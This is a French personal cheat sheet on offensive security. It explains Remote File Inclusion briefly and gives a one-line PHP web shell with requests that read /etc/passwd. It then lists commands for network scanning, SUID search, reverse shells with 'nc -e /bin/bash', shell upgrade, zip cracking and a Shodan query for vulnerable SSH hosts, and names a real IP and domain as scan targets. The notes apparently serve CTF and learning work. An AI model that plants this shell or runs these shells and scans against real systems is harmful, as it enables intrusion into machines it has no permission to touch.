sécuritée

remote file inclusion
Remote File Inclusion (RFI) est un type de vulnérabilité trouvé le plus souvent sur des sites web. Il permet à un attaquant d'inclure un fichier distant, généralement par le biais d'un script sur le serveur web. La vulnérabilité est due à l'utilisation de l'entrée fournie par l'utilisateur sans validation adéquate
file img.php :
###################
<?php
system($_GET['phoenix']);
?>
permet d'executer une commande sur le site cibleurl?phoenix=id
url?phoenix=cat%20../../../../etc/passwd





Quelques commandes utiles
nmap [ip] -sP -e [interface]connaitre les hotes sur le réseau
nmap -An -p 1-65535 [ip] connaitre les port ouvert d'une machine
pdftotexttransforme un pdf en texte dans le paquet poppler
netstat -plantsaffiches les connexions
binwalk -h stegaographic tools
foremost recuperer des fichiers caches
stringsaffiche toutes les chaines de caractere d'un fichier
exrexpermet de génerer toutes les possibilite sur une chaine
zsteg steganographie tools
exemple : zsteg b1,rgb,lsb,y
xxdconvertisseur hexadecimal
nikto -url 82.65.105.229 permet de connaitre la version d'apache
dirb http://www.domotrix.frmapper un site
https://gtfobins.github.io/#permet l'escalade de privilege
python -m SimpleHTTPServercree un serveur python petit
brainfuck
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/escalade de privilege
https://www.shodan.io/liste des version vulnerables
port:22 libssh country="FR"
arp-scan -lpermet de voir les hotes du reseau
find / -perm -u=s -type f 2>/dev/nullpermet de voir les fichier ou le sticky bit est positionnee
url?cmd=nc -lnvp 1234ouvre uneconnexion sur le port 1234
nc -e /bin/bash <ip> <port>ouvre une connection
pidofconnaitre le nom d'un processus
fgforeground
bgbackground
uname -aavoir les information sur la version
python -c 'import pty;pty.spawn("/bin/bash")'
fcrackzipcraquer les mot de passes zip
#!/bin/bash
List=`nmap 192.168.1.1/24 -sP | sed 's/^Nmap scan report for \([0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\).*$/\1/' | grep "^[0-9]"`
echo $List
a=0;
for i in $List; do
echo $i
echo "------------------"
port=`nmap -An "$i" |grep "^[0-9]"`
echo $port
echo "------------------"
done
openssl openssl x509 -inform DER -in <fichier> -textpour lire un certificat
echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.confbloquer la réponse au ping
$ find / -name "word" $ grep -r -i word ./ $ sed '/debut/,/fin/ s/.*//' fichier $ grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" $ python -c 'import pty;pty.spawn("/bin/bash")' $ python -m SimpleHTTPServer $ python3 -m http.server $ for i in {0..10}; do echo "$i"; done $ nc -e /bin/bash $ arp-scan -l $ nmap -sP $ nmap -An $ select user,host from mysql.user;